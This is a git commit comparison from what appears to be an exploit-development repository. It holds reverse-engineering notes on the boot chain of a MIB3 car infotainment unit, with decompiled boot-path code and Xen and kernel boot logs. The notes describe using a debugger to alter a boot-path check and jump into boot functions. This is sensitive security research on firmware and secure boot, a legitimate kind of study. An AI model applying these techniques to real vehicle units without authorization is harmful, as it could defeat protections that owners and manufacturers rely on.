Compare commits

...

6 Commits

Author SHA1 Message Date
Jonathan Herrewijnen
da14253312 Cleaning up code 2024-12-10 19:47:56 +01:00
Jonathan Herrewijnen
d8163d1a15 Merge branch 'main' of git.eminjenv.nl:nfi-exploitdev/samsung_s7 2024-12-10 18:58:54 +01:00
Jonathan Herrewijnen
15c848b190 belated commit (needs cleaning) 2024-12-10 18:58:47 +01:00
Floris van Silfhout
2dd0ef7106 Fix requirements 2024-12-09 11:15:37 +01:00
Floris van Silfhout
93a1be94b2 Update requirements 2024-12-09 10:53:42 +01:00
Jonathan Herrewijnen
1dec7120f1 patching introduced bugs 2024-12-09 10:51:36 +01:00
16 changed files with 6487 additions and 290 deletions

View File

@ -165,61 +165,96 @@ Kibini
^^^^^^
Kibini is part of SBoot, and is probably extracteable
Wahrheit
Wahrheit is visible after uboot (see boot logs from a normal/working MIB3 boot).
XEN logs
^^^^^^^^^^
--------
Xen logs of a normal boot flow.
.. code:: bash
<20><>Recovery mode
=> Return value : 3oad LDFW
[PASS] Succeed to load LDFW
=> Return value : 3
S8=> Return value : 0
Xen 4.8.0
[ 0.201928] [ 0.560934] [0: swapper/0: 1] Initramfs unpacking failed: junk in compressed archive
[wahrheit] Version: 0.2.7
[wahrheit] Build-ID: 765ac35fe6cda5bb5458f05858e77cc392034b3c2676bdb8783143fe43fb58fb
[ 0.757925] [ 1.116930] [2: esoinsmod: 1222] vbb xen-vbb: driver probed successfully(VBB : 20171226)
[ 0.761554] [ 1.120560] [2: esoinsmod: 1222] BQ buffer-queue: buffer-queue driver probed successfully(BUFQ : 20190322)
Done setting up Dom0
Parsing config from /vm/linux-ivi-vm/linux-ivi-vm_ufs_c3_a.cfg
svdm will be executed.
(XEN) [ 0.209091] [SB_ERR]Integrity check fail
clk is applied
pinctrl is applied
vinput is applied
pcie is applied
pvusb is applied
SIGNATURE VALID OR UNIT NOT FUSED: 0xC9200000
SIGNATURE VALID OR UNIT NOT FUSED: 0xC1080000
(XEN) [ 0.209119] [SB_ERR]verify_signature: binary ID = [0x10], return = [0x50E01]
(DU1) [ 0.389911] [ 3.030438] Initramfs unpacking failed: junk in compressed archive
(XEN) [ 0.209128] Dom[1] Fail to auth the dtb binary, ret:331265
(DU1) [ 0.505209] [ 3.145737] vbufq vbufq-0: vbufq_fe_probe: probed success. nodename(device/vbufq/0), ver(VBQ : 20170824)
(XEN) [ 0.209565] Dom[0] 2th, load kernel binary at 0000000081280000, 0000000000100000
(DU1) [wahrheit] Version: 0.2.7
(XEN) [ 0.211313] Static RAM[00000008c0000000 ~ 000000097a000000] -> guest address [00000008c0000000 ~ 000000097a000000]
(DU1) [wahrheit] Build-ID: 765ac35fe6cda5bb5458f05858e77cc392034b3c2676bdb8783143fe43fb58fb
(XEN) [ 0.226360]
(XEN) [ 3.309333] mm.c:1523:d0v0 gnttab_mark_dirty not implemented yet
(XEN) [ 0.226360] ****************************************
(DU1) RUNMODE=normal
(XEN) [ 0.233678] Loading dom initrd from 0000000089200000 to 0x0000000089200000-0x0000000089340000
(DU1) ESO_SKU=177811101011100000
(XEN) [ 0.237909] Dom[0] 3th, load kernel binary at 0000000081380000, 0000000000100000
(DU1) SOC_SKU=003-00000-0307-011
Buildname = CL33_MIB3H_AU_ER_G4x_2002403PROD
HW_REV = 011
(XEN) [ 0.245791] DOM RAM Popluation of the pre-assigned range done. unassigned mem:0x 0000000000000000 Bytes
(DU1) scandir: No such file or directory
INIT DONE
DAEMON: [DM Ver] omx(1.0).date(191118).hv2.2-1946.2-PR47.2
(XEN) [ 0.253771] Panic on CPU 7:
(DU1) INIT DONE
CHALLENGE [INFO] : Started.
(XEN) [ 0.263057] Allocating PPI 16 for event channel interrupt
(DU1) CHALLENGE [INFO] : Started.
OOC 4.25.6-DEVELOPMENT
[OOC:INF] OocApplication: All files already present.
[OOC:INF] StartupManager
[OOC:INF] SuspendNotifyClient: Connected
[OOC:INF] OocApplication: run
[OOC:INF] RunmodeMgr: Invalid MMX boot index found: -> assume A
[OOC:INF] rstp init frame: c4 80 80 80
[OOC:INF] RSTP init frame: RSC reports boot path: boot path A
[OOC:INF] Systemstate: Runmode updated: normal
[OOC:INF] SystemState: Request delay: 'Online Delay' = '1'
[OOC:INF] AsiOocPwrman started successfully
[OOC:INF] SystemState: Power State: MMI_STANDBY_PWR_SAVE_2, reason: 0x0
[OOC:INF] SystemState: Clamp States: Clamp S: 0, Clamp 15: 0
[OOC:INF] SystemState: Display State: display1: 0
[OOC:INF] SystemState: Display State: display2: 0
[OOC:INF] AsiPersistenceClient: sizes: 1, 1
[OOC:INF] AsiPersistenceClient: alive
[OOC:INF] AsiPersistenceClient: S2R: active
[OOC:INF] SystemState: S2R enabled: 1 (changed: 1)
[OOC:INF] Startup: Timer running (init: 118569 ms)
[OOC:INF] SystemState: ZR Active (Startup): 1 (changed: 1)
[OOC:INF] SystemState: Sent ZrActive request: 1
[AIO:ERR] epoll_ctl: add of file descriptor failed: File exists
CURRENT BOOTCYCLE (SYS): 615
[OOC:INF] AsiOoclClient: Proxy alive
[OOC:INF] AsiOoclClient: Proxy alive: state: true
[OOC:INF] SystemState: Updated 'IVI is running': 1
tracing fsid is NOT available (state -1 | listsize 8 | FOD 2 | EL 0/0 | B2109BAD6D)
[OOC:INF] AsiServiceMgr: Startup Finished from Service Manager
[OOC:INF] SystemState: Startup Finished on SYS
[OOC:INF] AsiPwrman: MMXEVENT_ETHERNET_PHONE: app 2, state: 1
[OOC:INF] SystemState: PmouMmxEventEthernetPhone changed: 1
tracing fsid is NOT available (state -1 | listsize 8 | FOD 2 | EL 0/0 | B2109BAD6D)
(XEN) [ 0.274424] Dom[0] 4th, load kernel binary at 0000000081480000, 0000000000100000
(XEN) [ 0.284998] Fail to auth the dtb binary
(XEN) [ 0.291690] Loading dom0 DTB to 0x0000000089000000-0x000000008901e99e dtb_virt:0x0000000089000000
(XEN) [ 0.302564] Dom[0] 5th, load kernel binary at 0000000081580000, 0000000000100000
(XEN) [ 0.303995] ****************************************
(XEN) [ 0.303995]
(XEN) [ 0.313722] ___Dom0 construction done___
(XEN) [ 0.324977] Dom[0] 6th, load kernel binary at 0000000081680000, 0000000000100000
(XEN) [ 0.329844] Reboot in five seconds...
(XEN) [ 0.346093] Dom[0] 7th, load kernel binary at 0000000081780000, 0000000000100000
(XEN) [ 5.365817] exynos8890: keep scratch, 0xd (shutdown_code: 3)
(DU1) [ 18.191454] [ 20.831982] Call trace:

View File

@ -0,0 +1,166 @@
MIB3 boot chain
---------------
Normal boot flow log. If I am correct here, the boot flow from recovery and when going into uboot is not as different. The only slight difference is, that low-level, the SMC handler seems to know what boot path it is taking. The main boot function, at ``0xcf000028`` eventually goes into a function at ``0xcf05e218``. One of the first things this function does, is getting information from an address space at ``0xcf4dfb28`` (32 bytes long) using a function at ``0xcf05e5d0``. The values here are set somewhere during the boot process from U-Boot, as the contents before booting U-boot are empty (FFFF space). The only value not taken from BL33 space, is one taken from ``0x0206f800``. Some other information is also retrieved from ``0x136d0184`` using a function at ``0xcf053f60``. What is annoying here, is that these spaces in lower memory range, are only readable after booting the recovery mode once. Currently, after doing one failed boot, the MIB3 returns to the debugger (we set the LR, and it just returns). We can then again try to boot 'normally', but this always fails. (interestingly, the logs then fail on secure payload)
.. code:: bash
Recovery mode
[ERROR] Fail to load LDFW
=> Return value : -1
LDFX init status=> Return value : -1
[ERROR] Fail to load Secure payload
=> Return value : -.
Function that determines boot path (Recovery or otherwise). The function at ``is_not_first_boot_option_Q`` returns a boolean, which can be altered. The MIB3 then goes into a GPT not found panic.
.. code:: bash
void recovery_mode_Q_smc_0xFA(void) {
undefined8 uVar1;
int iVar2;
uint uVar3;
int iVar4;
hw_info_boot_path *phVar5;
undefined4 uStack_4000c;
long lStack_40008;
undefined4 uStack_40000;
undefined4 uStack_3fffc;
uint uStack_3ffd4;
uint uStack_3ffd0;
uStack_4000c = 0;
lStack_40008 = 0;
phVar5 = get_hw_info_boot_path_Q();
_DAT_14cc0000 = 0x220000;
DAT_14c30000 = 3;
DAT_14c30004 = 0x3c5;
DAT_14c30008 = 0x117;
DAT_14c30028 = 0x46;
DAT_14c3002c = 9;
_DAT_14cc0100 = 0x220000;
DAT_14c10000 = 3;
DAT_14c10004 = 0x3c5;
DAT_14c10008 = 0x117;
DAT_14c10028 = 0x46;
DAT_14c1002c = 9;
DAT_0206f870 = 0x101;
/* bl, 0xcf053fa8 */
iVar2 = is_not_first_boot_option_Q();
/* we see this on uart when doing usb recovery
cbz, w0,0xcf05e330 */
if (iVar2 != 0) {
uart_print_retval_Q(s_Recovery_mode_cf08aa4b,0);
uStack_40000 = load_LDFW_Q(phVar5->ldfw_part_id);
uart_print_retval_Q(s_LDFW_init_status_cf08aa59,&uStack_40000);
load_secure_payload_Q(phVar5->sec_os_part_id);
uart_print_retval_Q(s_Secure_OS_loaded_cf08aa6a,0);
_DAT_d9000100 = 0;
goto LAB_cf05e304;
}
uVar3 = get_MIB3_MMX_version_B1_B2();
if (uVar3 < 6) {
uVar3 = _DAT_10580004 & 8;
LAB_cf05e34c:
if (uVar3 == 0) goto LAB_cf05e304;
}
else if (uVar3 == 6) {
uVar3 = _DAT_10580024 & 1;
goto LAB_cf05e34c;
}
lStack_40008 = do_smc(0xffffffffffffff06,0,0,0);
if (lStack_40008 != 0) {
uart_print_retval_Q(s_[ERROR]_Fail_to_load_GPT_cf08aa7b,&lStack_40008);
do {
/* WARNING: Do nothing block with infinite loop */
} while( true );
}
FUN_cf05dd00(0x5200);
if (((DAT_105c0404 & 0x11800000) == 0) || (_DAT_d9000100 != 0xd)) {
uVar3 = 0;
}
else {
uVar3 = 1;
_DAT_d9000100 = 0;
}
load_LDFW_Q(phVar5->ldfw_part_id);
iVar2 = custom_otp_read_warranty_Q();
load_secure_payload_Q(phVar5->sec_os_part_id);
do_smc_0xFB_MIBCERT_Q(&uStack_40000);
if (((CONCAT44(uStack_3fffc,uStack_40000) == 0x5452454342494d) &&
(iVar4 = do_smc_0x101d(0,&uStack_40000,0x40000), iVar4 == 0)) &&
(iVar4 = FUN_cf05e098(&uStack_40000), iVar4 != 0)) {
iVar4 = do_smc_0xFB();
if (((uint)(iVar4 == 1) & uStack_3ffd0 >> 0x1d & 1 & uVar3) != 0) {
uart_print_retval_Q(s_Ramdump_mode_detected,_certifica_cf08aa96,0);
goto LAB_cf05e304;
}
if ((iVar2 == 0) && ((uStack_3ffd4 & 0x60000000) != 0)) {
FUN_cf05e1e4();
}
}
else {
iVar4 = 0;
uStack_3ffd4 = 0;
uStack_3ffd0 = 0;
}
do_smc_0xFB(phVar5->hyp_part_id,&hypervisor,s_[ERROR]_Fail_to_load_Hypervisor_cf08aabf);
FUN_cf05dd00(0x5500);
if (hypervisor != 'M') {
return;
}
if (DAT_80200001 != 'Z') {
return;
}
do_smc_0xFB(phVar5->dtb_part_id,&dtb,s_[ERROR]_Fail_to_load_DTB_cf08aae1);
FUN_cf05dd00(0x5600);
uVar3 = uStack_3ffd4 & 0x80;
if ((uStack_3ffd4 >> 2 & 1) == 0) {
do_smc_0xFC_fail_hang(&hypervisor,phVar5->hyp_part_id,0);
}
if (uVar3 == 0) {
do_smc_0xFC_fail_hang(&dtb,phVar5->dtb_part_id,1);
}
lStack_40008 = do_smc(0xfffffffffffff8ff,0,0,0);
if (lStack_40008 == 0) {
uart_print_retval_Q(s_[ERROR]_Fail_to_disable_CP_cf08aafc,&lStack_40008);
do {
/* WARNING: Do nothing block with infinite loop */
} while( true );
}
/* This is printed on regular bootflow, not on recovery? */
uart_print_retval_Q(s_S8_cf08ab19,&uStack_4000c);
FUN_cf05dd00(0x5c00);
watchdog_Q = watchdog_Q & 0xffffffde;
FUN_cf05dd00(0);
uVar1 = 0xdead;
if (iVar4 == 0) {
uVar1 = 0;
}
_DAT_d9000100 = 0xd;
jump_to_hypervisor_Q
(phVar5->kerneldom0_part_id,phVar5->dtb_domu1_part_id,phVar5->kerneldomou1_part_id,
phVar5->field5_0x14,phVar5->field8_0x20,phVar5->emmc0_ufs1,
CONCAT44(uStack_3ffd0,uStack_3ffd4),uVar1);
LAB_cf05e304:
watchdog_Q = watchdog_Q & 0xffffffde;
return;
}
Another option is to manually continue the bootflow by jumping into the function at ``0xcf05dd00``, but this then prints the following, but does not continue the boot flow. Retrospecitvely, I did not explicitly check the link register (which is very likely important here..). But, the normal boot does not print the information below.
.. code:: bash
U-Boot 2012.07-gc7c41ec14-dirty (Oct 23 2019 - 12:53:04) for SADK8890
CPU: Exynos8890 Rev2.0 [Samsung SOC on SMP Platform Base on ARM CortexA53]
MNGS_PLL = 1975MHz APOLLO_PLL = 1481MHz MIF_PLL = 1539MHz
BUS0_PLL = 1056MHz BUS1_PLL = 800MHz BUS2_PLL = 672MHz BUS3_PLL = 1872MHz
MFC_PLL = 71MHz AUD_PLL = 494MHz G3D_PLL = 650MHz DISP_PLL = 63MHz
Board: SADK8890
DRAM: 6 GiB
ECT: PARA006o

View File

@ -291,19 +291,4 @@ If jumping into the boot BL33 function twice, the LDFW returns -. at the second
[ERROR] Fail to load Secure payload
=> Return value : -.
When continuing the boot flow by jumping into cf0052f8 after recovery boot
.. code:: bash
U-Boot 2012.07-gc7c41ec14-dirty (Oct 23 2019 - 12:53:04) for SADK8890
CPU: Exynos8890 Rev2.0 [Samsung SOC on SMP Platform Base on ARM CortexA53]
MNGS_PLL = 1975MHz APOLLO_PLL = 1481MHz MIF_PLL = 1539MHz
BUS0_PLL = 1056MHz BUS1_PLL = 800MHz BUS2_PLL = 672MHz BUS3_PLL = 1872MHz
MFC_PLL = 71MHz AUD_PLL = 494MHz G3D_PLL = 650MHz DISP_PLL = 63MHz
Board: SADK8890
DRAM: 6 GiB
ECT: PARA006o
I dumped the contents of 0xcf4dfb28 to 60, which is a boot path information setter. Something in BL33 is setting this, because it is still empty (0xFF) after booting into BL2 and waiting for BL33.

View File

@ -0,0 +1 @@
name,type,address,length
1 name type address length

View File

@ -0,0 +1,10 @@
Recovery mode
[ERROR] Fail to load LDFW
=> Return value : -1
LDFX init status=> Return value : -1
[ERROR] Fail to load Secure payload
=> Return value : -.

View File

@ -0,0 +1,106 @@
þ
[PASS] Succeed to load LDFW
=> Return value : 3
S8=> Return value : 0
Xen 4.8.0
(XEN) [ 0.209401] [SB_ERR]Integrity check fail
(XEN) [ 0.209430] [SB_ERR]verify_signature: binary ID = [0x10], return = [0x50E01]
(XEN) [ 0.209445] Dom[1] Fail to auth the dtb binary, ret:331265
(XEN) [ 0.209957] Dom[0] 2th, load kernel binary at 0000000081280000, 0000000000100000
(XEN) [ 0.211705] Static RAM[00000008c0000000 ~ 000000097a000000] -> guest address [00000008c0000000 ~ 000000097a000000]
(XEN) [ 0.226667]
(XEN) [ 0.226667] ****************************************
(XEN) [ 0.234033] Loading dom initrd from 0000000089200000 to 0x0000000089200000-0x0000000089340000
(XEN) [ 0.238218] Dom[0] 3th, load kernel binary at 0000000081380000, 0000000000100000
(XEN) [ 0.246097] DOM RAM Popluation of the pre-assigned range done. unassigned mem:0x 0000000000000000 Bytes
(XEN) [ 0.254077] Panic on CPU 7:
(XEN) [ 0.263364] Allocating PPI 16 for event channel interrupt
(XEN) [ 0.274995] Dom[0] 4th, load kernel binary at 0000000081480000, 0000000000100000
(XEN) [ 0.285305] Fail to auth the dtb binary
(XEN) [ 0.291997] Loading dom0 DTB to 0x0000000089000000-0x000000008901e99e dtb_virt:0x0000000089000000
(XEN) [ 0.302884] Dom[0] 5th, load kernel binary at 0000000081580000, 0000000000100000
(XEN) [ 0.304301] ****************************************
(XEN) [ 0.304301]
(XEN) [ 0.314029] ___Dom0 construction done___
(XEN) [ 0.325528] Dom[0] 6th, load kernel binary at 0000000081680000, 0000000000100000
(XEN) [ 0.330151] Reboot in five seconds...
(XEN) [ 0.346379] Dom[0] 7th, load kernel binary at 0000000081780000, 0000000000100000
(XEN) [ 5.366125] exynos8890: keep scratch, 0xd (shutdown_code: 3)
þ
[PASS] Succeed to load LDFW
=> Return value : 3
S8=> Return value : 0
Xen 4.8.0
(XEN) [ 0.209313] [SB_ERR]Integrity check fail
(XEN) [ 0.209342] [SB_ERR]verify_signature: binary ID = [0x10], return = [0x50E01]
(XEN) [ 0.209350] Dom[1] Fail to auth the dtb binary, ret:331265
(XEN) [ 0.209774] Dom[0] 2th, load kernel binary at 0000000081280000, 0000000000100000
(XEN) [ 0.211530] Static RAM[00000008c0000000 ~ 000000097a000000] -> guest address [00000008c0000000 ~ 000000097a000000]
(XEN) [ 0.226580]
(XEN) [ 0.226580] ****************************************
(XEN) [ 0.233808] Loading dom initrd from 0000000089200000 to 0x0000000089200000-0x0000000089340000
(XEN) [ 0.238012] Dom[0] 3th, load kernel binary at 0000000081380000, 0000000000100000
(XEN) [ 0.246011] DOM RAM Popluation of the pre-assigned range done. unassigned mem:0x 0000000000000000 Bytes
(XEN) [ 0.253991] Panic on CPU 7:
(XEN) [ 0.263277] Allocating PPI 16 for event channel interrupt
(XEN) [ 0.274913] Dom[0] 4th, load kernel binary at 0000000081480000, 0000000000100000
(XEN) [ 0.285218] Fail to auth the dtb binary
(XEN) [ 0.291911] Loading dom0 DTB to 0x0000000089000000-0x000000008901e99e dtb_virt:0x0000000089000000
(XEN) [ 0.303097] Dom[0] 5th, load kernel binary at 0000000081580000, 0000000000100000
(XEN) [ 0.304215] ****************************************
(XEN) [ 0.304215]
(XEN) [ 0.313944] ___Dom0 construction done___
(XEN) [ 0.325435] Dom[0] 6th, load kernel binary at 0000000081680000, 0000000000100000
(XEN) [ 0.330064] Reboot in five seconds...
(XEN) [ 0.346309] Dom[0] 7th, load kernel binary at 0000000081780000, 0000000000100000
(XEN) [ 5.366038] exynos8890: keep scratch, 0xd (shutdown_code: 3)

View File

@ -0,0 +1,975 @@
[PASS] Succeed to load LDFW
=> Return value : 3
S8=> Return value : 0
Xen 4.8.0
[ 0.201928] [ 0.560934] [0: swapper/0: 1] Initramfs unpacking failed: junk in compressed archive
[wahrheit] Version: 0.2.7
[wahrheit] Build-ID: 765ac35fe6cda5bb5458f05858e77cc392034b3c2676bdb8783143fe43fb58fb
[ 0.757925] [ 1.116930] [2: esoinsmod: 1222] vbb xen-vbb: driver probed successfully(VBB : 20171226)
[ 0.761554] [ 1.120560] [2: esoinsmod: 1222] BQ buffer-queue: buffer-queue driver probed successfully(BUFQ : 20190322)
Done setting up Dom0
Parsing config from /vm/linux-ivi-vm/linux-ivi-vm_ufs_c3_a.cfg
svdm will be executed.
clk is applied
pinctrl is applied
vinput is applied
pcie is applied
pvusb is applied
SIGNATURE VALID OR UNIT NOT FUSED: 0xC9200000
SIGNATURE VALID OR UNIT NOT FUSED: 0xC1080000
(DU1) [ 0.389911] [ 3.030438] Initramfs unpacking failed: junk in compressed archive
(DU1) [ 0.505209] [ 3.145737] vbufq vbufq-0: vbufq_fe_probe: probed success. nodename(device/vbufq/0), ver(VBQ : 20170824)
(DU1) [wahrheit] Version: 0.2.7
(DU1) [wahrheit] Build-ID: 765ac35fe6cda5bb5458f05858e77cc392034b3c2676bdb8783143fe43fb58fb
(XEN) [ 3.309333] mm.c:1523:d0v0 gnttab_mark_dirty not implemented yet
(DU1) RUNMODE=normal
(DU1) ESO_SKU=177811101011100000
(DU1) SOC_SKU=003-00000-0307-011
Buildname = CL33_MIB3H_AU_ER_G4x_2002403PROD
HW_REV = 011
(DU1) scandir: No such file or directory
INIT DONE
DAEMON: [DM Ver] omx(1.0).date(191118).hv2.2-1946.2-PR47.2
(DU1) INIT DONE
CHALLENGE [INFO] : Started.
(DU1) CHALLENGE [INFO] : Started.
OOC 4.25.6-DEVELOPMENT
[OOC:INF] OocApplication: All files already present.
[OOC:INF] StartupManager
[OOC:INF] SuspendNotifyClient: Connected
[OOC:INF] OocApplication: run
[OOC:INF] RunmodeMgr: Invalid MMX boot index found: -> assume A
[OOC:INF] rstp init frame: c4 80 80 80
[OOC:INF] RSTP init frame: RSC reports boot path: boot path A
[OOC:INF] Systemstate: Runmode updated: normal
[OOC:INF] SystemState: Request delay: 'Online Delay' = '1'
[OOC:INF] AsiOocPwrman started successfully
[OOC:INF] SystemState: Power State: MMI_STANDBY_PWR_SAVE_2, reason: 0x0
[OOC:INF] SystemState: Clamp States: Clamp S: 0, Clamp 15: 0
[OOC:INF] SystemState: Display State: display1: 0
[OOC:INF] SystemState: Display State: display2: 0
[OOC:INF] AsiPersistenceClient: sizes: 1, 1
[OOC:INF] AsiPersistenceClient: alive
[OOC:INF] AsiPersistenceClient: S2R: active
[OOC:INF] SystemState: S2R enabled: 1 (changed: 1)
[OOC:INF] Startup: Timer running (init: 118569 ms)
[OOC:INF] SystemState: ZR Active (Startup): 1 (changed: 1)
[OOC:INF] SystemState: Sent ZrActive request: 1
[AIO:ERR] epoll_ctl: add of file descriptor failed: File exists
CURRENT BOOTCYCLE (SYS): 615
[OOC:INF] AsiOoclClient: Proxy alive
[OOC:INF] AsiOoclClient: Proxy alive: state: true
[OOC:INF] SystemState: Updated 'IVI is running': 1
tracing fsid is NOT available (state -1 | listsize 8 | FOD 2 | EL 0/0 | B2109BAD6D)
[OOC:INF] AsiServiceMgr: Startup Finished from Service Manager
[OOC:INF] SystemState: Startup Finished on SYS
[OOC:INF] AsiPwrman: MMXEVENT_ETHERNET_PHONE: app 2, state: 1
[OOC:INF] SystemState: PmouMmxEventEthernetPhone changed: 1
tracing fsid is NOT available (state -1 | listsize 8 | FOD 2 | EL 0/0 | B2109BAD6D)
(DU1) [ 18.191454] [ 20.831982] Call trace:
(DU1) [ 18.191483] [ 20.832011] [<ffffffc000213aa0>] drop_nlink+0x58/0x70
(DU1) [ 18.191524] [ 20.832052] [<ffffffbffc02eb40>] tffs_unlink+0x180/0xfd8 [tffs]
(DU1) [ 18.191564] [ 20.832092] [<ffffffbffc030bdc>] tffs_unlink_vfs+0x2c/0x38 [tffs]
(DU1) [ 18.191586] [ 20.832114] [<ffffffc00020306c>] vfs_unlink+0xcc/0x1c0
(DU1) [ 18.191605] [ 20.832132] [<ffffffc000208550>] do_unlinkat+0x248/0x2a8
(DU1) [ 18.191622] [ 20.832150] [<ffffffc000208db4>] SyS_unlinkat+0x3c/0x70
(DU1) [ 18.191641] [ 20.832169] [<ffffffc00008508c>] __sys_trace_return+0x0/0x4
(DU1) HB-IVI: 2015-01-01 - 12:00:32 - 00000000 - cpu: 78% - load: 0.96 - availmem: 2101MB - usermem: 1789MB
HB-SYS: 2015-01-01 - 12:00:33 - 00000000 - cpu: 43% - load: 0.44 - availmem: 1139MB - usermem: 370MB - temp1: 45.0C - temp2: 41.0C - gpu: 221176/35204
Adjusting SVGL_2064 (browserSlave) to nice level -10
Trying to find pid of process 'svdm_client'
Got pid 1890 for process 'svdm_client'
(DU1) HB-IVI: 2015-01-01 - 12:00:37 - 00000001 - cpu: 91% - load: 1.11 - availmem: 1976MB - usermem: 1896MB
[OOC:INF] AsiOoclClient: updateStartupFinished 1
(DU1) [ 37.035984] [ 39.676512] Call trace:
(DU1) [ 37.036065] [ 39.676593] [<ffffffbffc00dcf8>] tffs_process_delayed_evictions.isra.0+0x208/0x288 [tffs]
(DU1) [ 37.036135] [ 39.676662] [<ffffffbffc00dec0>] tffs_bio_end_io_write+0x148/0x208 [tffs]
(DU1) [ 37.036162] [ 39.676689] [<ffffffc0003e7a34>] bio_endio+0x8c/0xc0
(DU1) [ 37.036183] [ 39.676711] [<ffffffc0003ef8d0>] blk_update_request+0xc0/0x3a8
(DU1) [ 37.036207] [ 39.676735] [<ffffffc0003f9f54>] blk_mq_end_request+0x2c/0x90
(DU1) [ 37.036229] [ 39.676757] [<ffffffc0003fa2a4>] __blk_mq_complete_request+0x12c/0x150
[OOC:INF] SystemState: Startup Finished on IVI
[OOC:INF] SystemState: Startup Finished
[OOC:INF] Startup: finished
[OOC:INF] SystemState: ZR Active (Startup): 0 (changed: 1)
[OOC:INF] SystemState: Sent ZrActive request: 0
HB-SYS: 2015-01-01 - 12:00:38 - 00000001 - cpu: 84% - load: 0.73 - availmem: 1095MB - usermem: 383MB - temp1: 46.0C - temp2: 43.0C - gpu: 266328/4068
(DU1) [ 37.036251] [ 39.676778] [<ffffffc0003fa300>] blk_mq_complete_request+0x38/0x48
(DU1) [ 37.036275] [ 39.676803] [<ffffffc0005521dc>] blkif_interrupt+0x93c/0xb60
(DU1) [ 37.036295] [ 39.676823] [<ffffffc0000f81b4>] handle_irq_event_percpu+0x8c/0x2b8
(DU1) [ 37.036315] [ 39.676843] [<ffffffc0000f8430>] handle_irq_event+0x50/0x80
(DU1) [ 37.036335] [ 39.676863] [<ffffffc0000fbd30>] handle_edge_irq+0x148/0x1b0
(DU1) [ 37.036353] [ 39.676881] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 37.036377] [ 39.676904] [<ffffffc00049ff28>] __evtchn_fifo_handle_events+0x168/0x1f8
(DU1) [ 37.036397] [ 39.676925] [<ffffffc00049ffdc>] evtchn_fifo_handle_events+0x24/0x30
(DU1) [ 37.036419] [ 39.676946] [<ffffffc00049cb3c>] __xen_evtchn_do_upcall+0xa4/0x128
(DU1) [ 37.036439] [ 39.676967] [<ffffffc00049cbd4>] xen_hvm_evtchn_do_upcall+0x14/0x20
(DU1) [ 37.036462] [ 39.676990] [<ffffffc000097d34>] xen_arm_callback+0x14/0x20
(DU1) [ 37.036481] [ 39.677009] [<ffffffc0000fc558>] handle_percpu_devid_irq+0xb0/0x210
(DU1) [ 37.036502] [ 39.677029] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 37.036522] [ 39.677050] [<ffffffc0000f79a8>] __handle_domain_irq+0xa0/0x120
(DU1) [ 37.036543] [ 39.677071] [<ffffffc0000815bc>] gic_handle_irq+0x6c/0xd0
(DU1) [ 37.036638] [ 39.677166] [<ffffffc0000848bc>] el1_irq+0x7c/0xf4
(DU1) [ 37.036660] [ 39.677188] [<ffffffc0003ef214>] generic_make_request+0xf4/0x1a0
(DU1) [ 37.036681] [ 39.677209] [<ffffffc0003ef368>] submit_bio+0xa8/0x1f0
(DU1) [ 37.037320] [ 39.677848] [<ffffffbffc00ed54>] tffs_bio_submit+0xac/0xd8 [tffs]
(DU1) [ 37.037385] [ 39.677913] [<ffffffbffc015f1c>] tffs_bio_da_writepage+0x614/0x1188 [tffs]
(DU1) [ 37.037449] [ 39.677977] [<ffffffbffc011450>] tffs_write_cache_pages+0x1a8/0x458 [tffs]
(DU1) [ 37.037508] [ 39.678035] [<ffffffbffc01182c>] tffs_bio_writepages_helper+0x12c/0x3b8 [tffs]
(DU1) [ 37.037568] [ 39.678095] [<ffffffbffc0156b4>] tffs_da_writepages+0x2c/0x40 [tffs]
(DU1) [ 37.037596] [ 39.678124] [<ffffffc0001985a0>] do_writepages+0x40/0x70
(DU1) [ 37.037619] [ 39.678147] [<ffffffc0002295f8>] __writeback_single_inode+0x60/0x4c8
(DU1) [ 37.037641] [ 39.678169] [<ffffffc00022a0b0>] writeback_sb_inodes+0x2a0/0x498
(DU1) [ 37.037664] [ 39.678191] [<ffffffc00022a34c>] __writeback_inodes_wb+0xa4/0xe8
(DU1) [ 37.037685] [ 39.678213] [<ffffffc00022a730>] wb_writeback+0x2e8/0x3a8
(DU1) [ 37.037706] [ 39.678234] [<ffffffc00022aeb0>] wb_workfn+0x100/0x4a8
(DU1) [ 37.037729] [ 39.678257] [<ffffffc0000bafe4>] process_one_work+0x204/0x510
(DU1) [ 37.037773] [ 39.678301] [<ffffffc0000bb41c>] worker_thread+0x12c/0x4b0
(DU1) [ 37.037797] [ 39.678325] [<ffffffc0000c1c7c>] kthread+0xf4/0x108
(DU1) [ 37.037819] [ 39.678347] [<ffffffc000084ff0>] ret_from_fork+0x10/0x20
HB-SYS: 2015-01-01 - 12:00:43 - 00000002 - cpu: 58% - load: 0.77 - availmem: 1106MB - usermem: 385MB - temp1: 45.0C - temp2: 42.0C - gpu: 248532/7016
HB-SYS: 2015-01-01 - 12:00:48 - 00000003 - cpu: 44% - load: 0.81 - availmem: 1109MB - usermem: 385MB - temp1: 44.0C - temp2: 42.0C - gpu: 248532/2920
(DU1) [ 48.131373] [ 50.771901] Kernel panic - not syncing: Watchdog detected hard LOCKUP on cpu 0
(DU1) [ 48.131409] [ 50.771937] CPU: 5 MPIDR: 80000003 PID: 0 Comm: swapper/5 Tainted: P W OE 4.4.36 #1
(DU1) [ 48.131430] [ 50.771958] Hardware name: XENVM-4.8 (DT)
(DU1) [ 48.131441] [ 50.771969] Call trace:
(DU1) [ 48.131459] [ 50.771987] [<ffffffc000089878>] dump_backtrace+0x0/0x158
(DU1) [ 48.131476] [ 50.772003] [<ffffffc0000899f4>] show_stack+0x24/0x30
(DU1) [ 48.131493] [ 50.772021] [<ffffffc0004170b0>] dump_stack+0x90/0xb0
(DU1) [ 48.131510] [ 50.772037] [<ffffffc00018805c>] panic+0x100/0x24c
(DU1) [ 48.131525] [ 50.772053] [<ffffffc00014c3e0>] watchdog_timer_fn+0x310/0x3d8
(DU1) [ 48.131543] [ 50.772071] [<ffffffc00010e17c>] __hrtimer_run_queues+0x134/0x328
(DU1) [ 48.131558] [ 50.772086] [<ffffffc00010ea6c>] hrtimer_interrupt+0xb4/0x1e8
(DU1) [ 48.131578] [ 50.772106] [<ffffffc000676d2c>] arch_timer_handler_virt+0x3c/0x50
(DU1) [ 48.131595] [ 50.772123] [<ffffffc0000fc558>] handle_percpu_devid_irq+0xb0/0x210
(DU1) [ 48.131610] [ 50.772138] [<ffffffc0000f7624>] generic_handle_irq+0x34/0x50
(DU1) [ 48.131624] [ 50.772152] [<ffffffc0000f79a8>] __handle_domain_irq+0xa0/0x120
